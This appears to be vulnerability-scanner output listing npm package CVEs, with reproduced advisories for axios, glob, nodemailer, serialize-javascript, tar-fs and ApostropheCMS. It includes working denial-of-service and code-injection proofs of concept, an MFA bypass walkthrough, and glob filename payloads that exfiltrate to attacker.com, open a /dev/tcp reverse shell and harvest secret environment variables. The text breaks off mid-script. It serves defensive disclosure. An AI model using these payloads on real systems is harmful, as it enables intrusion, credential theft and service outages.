
TypeError: merge is not a function
    at computeConfigValue (lib/core/mergeConfig.js:100:25)
    at Object.forEach (lib/utils.js:280:10)
    at mergeConfig (lib/core/mergeConfig.js:98:9)

Control tests performed:

Test Config Result
Normal config {"timeout": 5000} SUCCESS
Malicious config JSON.parse('{"__proto__": {"x": 1}}') CRASH
Nested object {"headers": {"X-Test": "value"}} SUCCESS

Attack scenario:
An application that accepts user input, parses it with JSON.parse(), and passes it to axios configuration will crash when receiving the payload {"__proto__": {"x": 1}}.

Impact

Denial of Service - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.

Affected environments:

  • Node.js servers using axios for HTTP requests
  • Any backend that passes parsed JSON to axios configuration

This is NOT prototype pollution - the application crashes before any assignment occurs.

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range>=1.0.0
<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.102%
EPSS Percentile28th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 glob 10.4.5 (npm)

pkg:npm/glob@10.4.5

high 7.5: CVE--2025--64756 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range>=10.2.0
<10.5.0
Fixed version11.1.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Score0.038%
EPSS Percentile11th percentile
Description

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

  1. User runs glob -c <command> <pattern>
  2. CLI finds files matching the pattern
  3. Matched filenames are collected into an array
  4. Command is executed with matched filenames as arguments using shell: true
  5. Shell interprets metacharacters in filenames as command syntax
  6. Malicious filenames execute arbitrary commands

Affected Component:

  • CLI Only: The vulnerability affects only the command-line interface
  • Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
  • Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

  • Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
  • Any directory where attackers can control filenames (PR branches, archives, user uploads)
  • CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

  • The echo command executes normally
  • Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
  • A new file injected_poc is created, proving command execution
  • Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

  • Commands execute with full privileges of the user running glob CLI
  • No privilege escalation required - runs as current user
  • Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

  • Malicious PR adds files with crafted names to repository
  • CI pipeline uses glob -c to process files (linting, testing, deployment)
  • Commands execute in CI environment with build secrets and deployment credentials
  • Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

  • Developer clones repository or extracts archive containing malicious filenames
  • Local build scripts use glob -c for file processing
  • Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

  • Services using glob CLI to process uploaded files or external content
  • File uploads with malicious names trigger command execution
  • Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

  • Malicious packages or themes include files with crafted names
  • Build processes using glob CLI automatically process these files
  • Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

  • POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
  • Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
  • Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products

  • Ecosystem: npm
  • Package name: glob
  • Component: CLI only (src/bin.mts)
  • Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
  • Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
  • Patched versions: 11.1.0and 10.5.0

Scope Limitation:

  • Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
  • CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation

  • Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
  • If any glob CLI actions fail, then convert commands containing positional arguments, to use the --cmd-arg/-g option instead.
  • As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.
critical: 0 high: 1 medium: 0 low: 0 async 0.9.2 (npm)

pkg:npm/async@0.9.2

high 7.8: CVE--2021--43138 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range<2.6.4
Fixed version2.6.4, 3.2.2
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score0.657%
EPSS Percentile71st percentile
Description

A vulnerability exists in Async through 3.2.1 (fixed in 3.2.2), which could let a malicious user obtain privileges via the mapValues() method.

critical: 0 high: 1 medium: 0 low: 0 nodemailer 6.10.1 (npm)

pkg:npm/nodemailer@6.10.1

high 7.5: CVE--2025--14874 Improper Check or Handling of Exceptional Conditions

Affected range<=7.0.10
Fixed version7.0.11
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.086%
EPSS Percentile25th percentile
Description

Summary

A DoS can occur that immediately halts the system due to the use of an unsafe function.

Details

According to RFC 5322, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list.
However, the code implemented for this flattening process can be exploited by malicious input and triggers DoS

RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group.
At the following location in lib/addressparser/index.js:

https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90

there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:

g0: g1: g2: g3: ... gN: victim@example.com;

Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern
addressparser → _handleAddress → addressparser → ...
for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.

The problematic code section is as follows:

if (isGroup) {
    ...
    if (data.group.length) {
        let parsedGroup = addressparser(data.group.join(',')); // <- boom!
        parsedGroup.forEach(member => {
            if (member.group) {
                groupMembers = groupMembers.concat(member.group);
            } else {
                groupMembers.push(member);
            }
        });
    }
}

data.group is expected to contain members separated by commas, but in the attacker’s payload the group contains colon (:) tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.

PoC

const nodemailer = require('nodemailer');

function buildDeepGroup(depth) {
  let parts = [];
  for (let i = 0; i < depth; i++) {
    parts.push(`g${i}:`);
  }
  return parts.join(' ') + ' user@example.com;';
}

const DEPTH = 3000; // <- control depth 
const toHeader = buildDeepGroup(DEPTH);
console.log('to header length:', toHeader.length);

const transporter = nodemailer.createTransport({
  streamTransport: true,
  buffer: true,
  newline: 'unix'
});

console.log('parsing start');

transporter.sendMail(
  {
    from: 'test@example.com',
    to: toHeader,
    subject: 'test',
    text: 'test'
  },
  (err, info) => {
    if (err) {
      console.error('error:', err);
    } else {
      console.log('finished :', info && info.envelope);
    }
  }
);

As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.

Impact

The attacker can achieve the following:

  1. Force an immediate crash of any server/service that uses Nodemailer
  2. Kill the backend process with a single web request
  3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion”
critical: 0 high: 1 medium: 0 low: 0 connect-multiparty 2.2.0 (npm)

pkg:npm/connect-multiparty@2.2.0

high 7.8: CVE--2022--29623 Unrestricted Upload of File with Dangerous Type

Affected range<=2.2.0
Fixed versionNot Fixed
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score0.448%
EPSS Percentile63rd percentile
Description

An arbitrary file upload vulnerability in the file upload module of Express Connect-Multiparty 2.2.0 allows attackers to execute arbitrary code via a crafted PDF file. NOTE: the Supplier has not verified this vulnerability report.

critical: 0 high: 1 medium: 0 low: 0 serialize-javascript 6.0.2 (npm)

pkg:npm/serialize-javascript@6.0.2

high 8.1: GHSA--5c6j--r48x--rmvq Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')

Affected range<=7.0.2
Fixed version7.0.3
CVSS Score8.1
CVSS VectorCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
#h2. PoC 2: Code Injection via Date.toISOString()
const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
#h2. PoC 3: Remote Code Execution
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3

critical: 0 high: 1 medium: 0 low: 0 linkifyjs 4.2.0 (npm)

pkg:npm/linkifyjs@4.2.0

high 8.8: CVE--2025--8101 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Affected range<4.3.2
Fixed version4.3.2
CVSS Score8.8
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N
EPSS Score0.118%
EPSS Percentile30th percentile
Description

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Linkify (linkifyjs) allows XSS Targeting HTML Attributes and Manipulating User-Controlled Variables.This issue affects Linkify: from 4.3.1 before 4.3.2.

critical: 0 high: 1 medium: 0 low: 0 tar-fs 3.0.9 (npm)

pkg:npm/tar-fs@3.0.9

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range>=3.0.0
<3.1.1
Fixed version3.1.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.030%
EPSS Percentile8th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.3 (npm)

pkg:npm/tar-fs@2.1.3

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range>=2.0.0
<2.1.4
Fixed version2.1.4
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.030%
EPSS Percentile8th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 apostrophe 4.17.0 (npm)

pkg:npm/apostrophe@4.17.0

high 8.1: CVE--2026--32730 Improper Authentication

Affected range<=4.27.1
Fixed version4.28.0
CVSS Score8.1
CVSS VectorCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Description

MFA/TOTP Bypass via Incorrect MongoDB Query in Bearer Token Middleware

Summary

The bearer token authentication middleware in @apostrophecms/express/index.js (lines 386-389) contains an incorrect MongoDB query that allows incomplete login tokens — where the password was verified but TOTP/MFA requirements were NOT — to be used as fully authenticated bearer tokens. This completely bypasses multi-factor authentication for any ApostropheCMS deployment using @apostrophecms/login-totp or any custom afterPasswordVerified login requirement.

Severity

The AC is High because the attacker must first obtain the victim's password. However, the entire purpose of MFA is to protect accounts when passwords are compromised (credential stuffing, phishing, database breaches), so this bypass negates the security control entirely.

Affected Versions

All versions of ApostropheCMS from 3.0.0 to 4.27.1, when used with @apostrophecms/login-totp or any custom afterPasswordVerified requirement.

Root Cause

In packages/apostrophe/modules/@apostrophecms/express/index.js, the getBearer() function (line 377) queries MongoDB for valid bearer tokens. The query at lines 386-389 is intended to only match tokens where the requirementsToVerify array is either absent (no MFA configured) or empty (all MFA requirements completed):

async function getBearer() {
    const bearer = await self.apos.login.bearerTokens.findOne({
        _id: req.token,
        expires: { $gte: new Date() },
        // requirementsToVerify array should be empty or inexistant
        // for the token to be usable to log in.
        $or: [
            { requirementsToVerify: { $exists: false } },
            { requirementsToVerify: { $ne: [] } }  // BUG
        ]
    });
    return bearer && bearer.userId;
}

The comment correctly states the intent: the array should be "empty or inexistant." However, the MongoDB operator $ne: [] matches documents where requirementsToVerify is NOT an empty array — meaning it matches tokens that still have unverified requirements. This is the exact opposite of the intended behavior.

Token State requirementsToVerify $ne: [] result Should match?
No MFA configured (field absent) N/A ($exists: false matches) Yes
TOTP pending ["AposTotp"] true (BUG!) No
All verified [] false (BUG!) Yes
Field removed ($unset) (field absent) N/A ($exists: false matches) Yes

Attack Scenario

Prerequisites

  • ApostropheCMS instance with @apostrophecms/login-totp enabled
  • Attacker knows the victim's username and password (e.g., from credential stuffing, phishing, or a database breach)
  • Attacker does NOT know the victim's TOTP secret/code

Steps

  1. Authenticate with password only:

    POST /api/v1/@apostrophecms/login/login
    Content-Type: application/json
    
    {"username": "admin", "password": "correct_password", "session": false}
    
  2. Receive incomplete token (server correctly requires TOTP):

    {"incompleteToken": "clxxxxxxxxxxxxxxxxxxxxxxxxx"}
  3. Use incomplete token as bearer token (bypassing TOTP):

    GET /api/v1/@apostrophecms/page
    Authorization: Bearer clxxxxxxxxxxxxxxxxxxxxxxxxx
    
  4. Full authenticated access granted. The bearer token middleware matches the token because requirementsToVerify: ["AposTotp"] satisfies $ne: []. The attacker has complete API access as the victim without ever providing a TOTP code.

Proof of Concept

See mfa-bypass-poc.js — demonstrates the query logic bug with all token states. Run:

#!/usr/bin/env node
/**
 * PoC: MFA/TOTP Bypass via Incorrect MongoDB Query in Bearer Token Middleware
 *
 * ApostropheCMS's bearer token middleware in @apostrophecms/express/index.js
 * has a logic error in the MongoDB query that validates bearer tokens.
 *
 * The comment says:
 *   "requirementsToVerify array should be empty or inexistant
 *    for the token to be usable to log in."
 *
 * But the actual query uses `$ne: []` (NOT equal to empty array),
 * which matches tokens WITH unverified requirements — the exact opposite
 * of the intended behavior.
 *
 * This allows an attacker who knows a user's password (but NOT their
 * TOTP code) to use the "incompleteToken" returned after password
 * verification as a fully authenticated bearer token, bypassing MFA.
 *
 * Affected: ApostropheCMS with @apostrophecms/login-totp (or any
 * custom afterPasswordVerified requirement)
 *
 * File: packages/apostrophe/modules/@apostrophecms/express/index.js:386-389
 */

const RED = '\x1b[91m';
const GREEN = '\x1b[92m';
const YELLOW = '\x1b[93m';
const CYAN = '\x1b[96m';
const RESET = '\x1b[0m';
const BOLD = '\x1b[1m';

// Simulate MongoDB's $ne operator behavior
function mongoNe(fieldValue, compareValue) {
  // MongoDB $ne: true if field value is NOT equal to compareValue
  // For arrays, MongoDB compares by value
  if (Array.isArray(fieldValue) && Array.isArray(compareValue)) {
    if (fieldValue.length !== compareValue.length) return true;
    return fieldValue.some((v, i) => v !== compareValue[i]);
  }
  return fieldValue !== compareValue;
}

// Simulate MongoDB's $exists operator
function mongoExists(doc, field, shouldExist) {
  const exists = field in doc;
  return exists === shouldExist;
}

// Simulate MongoDB's $size operator
function mongoSize(fieldValue, size) {
  if (!Array.isArray(fieldValue)) return false;
  return fieldValue.length === size;
}

// Simulate the VULNERABLE bearer token query (line 386-389)
function vulnerableQuery(token) {
  // $or: [
  //   { requirementsToVerify: { $exists: false } },
  //   { requirementsToVerify: { $ne: [] } }     <-- BUG
  // ]
  const cond1 = mongoExists(token, 'requirementsToVerify', false);
  const cond2 = ('requirementsToVerify' in token)
    ? mongoNe(token.requirementsToVerify, [])
    : false;
  return cond1 || cond2;
}

// Simulate the FIXED bearer token query
function fixedQuery(token) {
  // $or: [
  //   { requirementsToVerify: { $exists: false } },
  //   { requirementsToVerify: { $size: 0 } }    <-- FIX
  // ]
  const cond1 = mongoExists(token, 'requirementsToVerify', false);
  const cond2 = ('requirementsToVerify' in token)
    ? mongoSize(token.requirementsToVerify, 0)
    : false;
  return cond1 || cond2;
}

function banner() {
  console.log(`${CYAN}${BOLD}
╔══════════════════════════════════════════════════════════════════╗
║  ApostropheCMS MFA/TOTP Bypass PoC                              ║
║  Bearer Token Middleware — Incorrect MongoDB Query ($ne vs $eq)  ║
║  @apostrophecms/express/index.js:386-389                         ║
╚══════════════════════════════════════════════════════════════════╝${RESET}
`);
}

function test(name, token, expectedVuln, expectedFixed) {
  const vulnResult = vulnerableQuery(token);
  const fixedResult = fixedQuery(token);

  const vulnCorrect = vulnResult === expectedVuln;
  const fixedCorrect = fixedResult === expectedFixed;

  console.log(`${BOLD}${name}${RESET}`);
  console.log(`  Token: ${JSON.stringify(token)}`);
  console.log(`  Vulnerable query matches: ${vulnResult ? GREEN + 'YES' : RED + 'NO'}${RESET} (${vulnCorrect ? 'expected' : RED + 'UNEXPECTED!' + RESET})`);
  console.log(`  Fixed query matches:      ${fixedResult ? GREEN + 'YES' : RED + 'NO'}${RESET} (${fixedCorrect ? 'expected' : RED + 'UNEXPECTED!' + RESET})`);

  if (vulnResult && !fixedResult) {
    console.log(`  ${RED}=> BYPASS: Token accepted by vulnerable code but rejected by fix!${RESET}`);
  }
  console.log();
  return vulnResult && !fixedResult;
}

// ——— Main ———
banner();
const bypasses = [];

console.log(`${BOLD}--- Token States During Login Flow ---${RESET}\n`);

// 1. Normal bearer token (no MFA configured)
// Created by initialLogin when there are no lateRequirements
// Token: { _id: "xxx", userId: "yyy", expires: Date }
// No requirementsToVerify field at all
test(
  '[Token 1] Normal bearer token (no MFA) — should be ACCEPTED',
  { _id: 'token1', userId: 'user1', expires: new Date(Date.now() + 86400000) },
  true,  // vulnerable: accepted (correct)
  true   // fixed: accepted (correct)
);

// 2. Incomplete token — password verified, TOTP NOT verified
// Created by initialLogin when lateRequirements exist
// Token: { _id: "xxx", userId: "yyy", requirementsToVerify: ["AposTotp"], expires: Date }
const bypass1 = test(
  '[Token 2] Incomplete token (TOTP NOT verified) — should be REJECTED',
  { _id: 'token2', userId: 'user2', requirementsToVerify: ['AposTotp'], expires: new Date(Date.now() + 3600000) },
  true,  // vulnerable: ACCEPTED (BUG! $ne:[] matches ['AposTotp'])
  false  // fixed: rejected (correct)
);
if (bypass1) bypasses.push('TOTP bypass');

// 3. Token after all requirements verified (empty array, before $unset)
// After requirementVerify pulls each requirement from the array
// Token: { _id: "xxx", userId: "yyy", requirementsToVerify: [], expires: Date }
test(
  '[Token 3] All requirements verified (empty array) — should be ACCEPTED',
  { _id: 'token3', userId: 'user3', requirementsToVerify: [], expires: new Date(Date.now() + 86400000) },
  false, // vulnerable: REJECTED (BUG! $ne:[] does NOT match [])
  true   // fixed: accepted (correct)
);

// 4. Finalized token (requirementsToVerify removed via $unset)
// After finalizeIncompleteLogin calls $unset
// Token: { _id: "xxx", userId: "yyy", expires: Date }
test(
  '[Token 4] Finalized token ($unset completed) — should be ACCEPTED',
  { _id: 'token4', userId: 'user4', expires: new Date(Date.now() + 86400000) },
  true,  // vulnerable: accepted (correct)
  true   // fixed: accepted (correct)
);

// 5. Multiple unverified requirements
const bypass2 = test(
  '[Token 5] Multiple unverified requirements — should be REJECTED',
  { _id: 'token5', userId: 'user5', requirementsToVerify: ['AposTotp', 'CustomMFA'], expires: new Date(Date.now() + 3600000) },
  true,  // vulnerable: ACCEPTED (BUG!)
  false  // fixed: rejected (correct)
);
if (bypass2) bypasses.push('Multi-requirement bypass');

// Attack scenario
console.log(`${BOLD}--- Attack Scenario ---${RESET}\n`);
console.log(`  ${YELLOW}Prerequisites:${RESET}`);
console.log(`    - ApostropheCMS instance with @apostrophecms/login-totp enabled`);
console.log(`    - Attacker knows victim's username and password`);
console.log(`    - Attacker does NOT know victim's TOTP code\n`);

console.log(`  ${YELLOW}Step 1:${RESET} Attacker sends login request with valid credentials`);
console.log(`    POST /api/v1/@apostrophecms/login/login`);
console.log(`    {"username": "admin", "password": "correct_password", "session": false}\n`);

console.log(`  ${YELLOW}Step 2:${RESET} Server verifies password, returns incomplete token`);
